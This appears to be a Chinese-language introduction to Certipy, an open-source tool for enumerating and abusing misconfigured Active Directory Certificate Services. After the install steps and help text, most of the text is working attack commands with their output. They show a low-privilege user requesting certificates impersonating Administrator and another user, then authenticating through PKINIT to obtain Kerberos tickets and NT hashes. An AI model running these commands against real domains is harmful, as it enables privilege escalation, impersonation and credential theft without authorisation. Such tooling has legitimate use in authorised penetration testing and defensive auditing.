关于CertipyCertipy是一款基于Python开发的强大工具,该工具可以帮助广大研究人员枚举并利用活动目录证书服务(AD CS)中的错误配置项。工具安装广大研究人员可以使用下列命令将...
Certipy是一款基于Python开发的强大工具,该工具可以帮助广大研究人员枚举并利用活动目录证书服务(AD CS)中的错误配置项。
git clone https://github.com/ly4k/Certipy.git
$ python3 setup.py install
$ certipy -h usage: certipy [-h] [-debug] [-target-ip ip address] [-nameserver nameserver] [-dns-tcp] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address] target {find,req,auth,auto} ... Active Directory certificate abuse positional arguments: target [[域名/]用户名[:密码]@]目标名称或地址> {find,req,auth,auto} 操作 find 查找证书模板 req 请求一份新的证书 auth 使用证书进行认证 auto 自动利用证书实现提权 optional arguments: -h, --help 显示帮助信息 -debug 开启调试模式输出 -no-pass 不询问密码 -k 使用Kerberos认证。 -dc-ip ip address 目标域控制器的IP地址 connection: -target-ip ip address 目标设备的IP地址 -nameserver nameserver 用于DNS解析的域名服务器 -dns-tcp 使用TCP代替UDP执行DNS查询 authentication: -hashes LMHASH:NTHASH NTLM hashes, format is LMHASH:NTHASH
在下面的使用样例中,用户john是一个低权限用户,可以注册Copy of Web Server模板:
$ certipy 'predator/john:Passw0rd@dc.predator.local' auto [*] Trying template 'Copy of Web Server' with CA 'predator-DC-CA' [*] Generating RSA key [*] Requesting certificate [*] Request success [*] Got certificate with UPN 'Administrator' [*] Saved certificate to '1.crt' [*] Saved private key to '1.key' [*] Using UPN: 'Administrator@predator' [*] Trying to get TGT... [*] Saved credential cache to 'Administrator.ccache' [*] Trying to retrieve NT hash for 'Administrator@predator' [*] Got NT hash for 'Administrator@predator': fc525c9683e8fe067095ba2ddc971889
$ certipy 'predator/john:Passw0rd@dc.predator.local' find -vulnerable [*] Finding vulnerable certificate templates for 'john' User Name : predator\john Groups : Certificate Authorities 0 CA Name : predator-DC-CA DNS Name : dc.predator.local Certificate Subject : CN=predator-DC-CA, DC=predator, DC=local Certificate Serial Number : 1976D0FEFCAFC9A84D02D305FA88D84D Certificate Validity Start : 2021-10-06 11:32:01+00:00 Certificate Validity End : 2026-10-06 11:42:01+00:00 User Specified SAN : Disabled CA Permissions Owner : BUILTIN\Administrator Access Rights ManageCertificates : BUILTIN\Administrator predator\Domain Admins predator\Enterprise Admins ManageCa : BUILTIN\Administrator predator\Domain Admins predator\Enterprise Admins Enroll : Authenticated Users Vulnerable Certificate Templates 0 CAs : predator-DC-CA Template Name : Copy of Web Server Validity Period : 2 years Renewal Period : 6 weeks Certificate Name Flag : EnrolleeSuppliesSubject Enrollment Flag : None Authorized Signatures Required : 0 Extended Key Usage : Permissions Enrollment Permissions Enrollment Rights : predator\Domain Admins predator\Enterprise Admins Authenticated Users Object Control Permissions Owner : predator\Administrator Write Owner Principals : predator\Domain Admins predator\Enterprise Admins predator\Administrator Write Dacl Principals : predator\Domain Admins predator\Enterprise Admins predator\Administrator Write Property Principals : predator\Domain Admins predator\Enterprise Admins predator\Administrator Vulnerable Reasons : 'Authenticated Users' can enroll, enrollee supplies subject and template allows authentication 'Authenticated Users' can enroll and template has dangerous EKU
$ certipy 'predator/john:Passw0rd@dc.predator.local' find [*] Finding certificate templates for 'john' User Name : predator\john Groups : Certificate Authorities 0 CA Name : predator-DC-CA DNS Name : dc.predator.local Certificate Subject : CN=predator-DC-CA, DC=predator, DC=local Certificate Serial Number : 1976D0FEFCAFC9A84D02D305FA88D84D Certificate Validity Start : 2021-10-06 11:32:01+00:00 Certificate Validity End : 2026-10-06 11:42:01+00:00 User Specified SAN : Disabled CA Permissions Owner : BUILTIN\Administrator Access Rights ManageCertificates : BUILTIN\Administrator predator\Domain Admins predator\Enterprise Admins ManageCa : BUILTIN\Administrator predator\Domain Admins predator\Enterprise Admins Enroll : Authenticated Users Certificate Templates 0 CAs : predator-DC-CA Template Name : User Validity Period : 1 year Renewal Period : 6 weeks Certificate Name Flag : SubjectRequireDirectoryPath SubjectRequireEmail SubjectAltRequireEmail SubjectAltRequireUpn Enrollment Flag : AutoEnrollment PublishToDs IncludeSymmetricAlgorithms Authorized Signatures Required : 0 Extended Key Usage : Encrypting File System Secure Email Client Authentication Permissions Enrollment Permissions Enrollment Rights : predator\Domain Admins predator\Domain Users predator\Enterprise Admins Object Control Permissions Owner : predator\Enterprise Admins Write Owner Principals : predator\Domain Admins predator\Enterprise Admins Write Dacl Principals : predator\Domain Admins predator\Enterprise Admins Write Property Principals : predator\Domain Admins predator\Enterprise Admins [...] 11 CAs : predator-DC-CA Template Name : Copy of Web Server Validity Period : 2 years Renewal Period : 6 weeks Certificate Name Flag : EnrolleeSuppliesSubject Enrollment Flag : None Authorized Signatures Required : 0 Extended Key Usage : Permissions Enrollment Permissions Enrollment Rights : predator\Domain Admins predator\Enterprise Admins Authenticated Users Object Control Permissions Owner : predator\Administrator Write Owner Principals : predator\Domain Admins predator\Enterprise Admins predator\Administrator Write Dacl Principals : predator\Domain Admins predator\Enterprise Admins predator\Administrator Write Property Principals : predator\Domain Admins predator\Enterprise Admins predator\Administrator
用户josh将会以用户jane的身份请求一个有效的身份认证证书,predator-DC-CA已启用了Copy of Web Server:
$ certipy 'predator/john:Passw0rd@dc.predator.local' req -template 'Copy of Web Server' -ca 'predator-DC-CA' -alt 'jane' [*] Generating RSA key [*] Requesting certificate [*] Request success [*] Got certificate with UPN 'jane' [*] Saved certificate to '2.crt' [*] Saved private key to '2.key'
$ certipy 'predator/john:Passw0rd@dc.predator.local' req -template 'User' -ca 'predator-DC-CA' [*] Generating RSA key [*] Requesting certificate [*] Request success [*] Got certificate with UPN 'john@predator.local' [*] Saved certificate to '3.crt' [*] Saved private key to '3.key'
auth操作将会使用PKINIT Kerberos扩展来对提供的证书进行身份认证:
$ certipy 'predator/jane@dc.predator.local' auth -cert ./2.crt -key ./2.key [*] Using UPN: 'jane@predator' [*] Trying to get TGT... [*] Saved credential cache to 'jane.ccache' [*] Trying to retrieve NT hash for 'jane@predator' [*] Got NT hash for 'jane@predator': 077cccc23f8ab7031726a3b70c694a49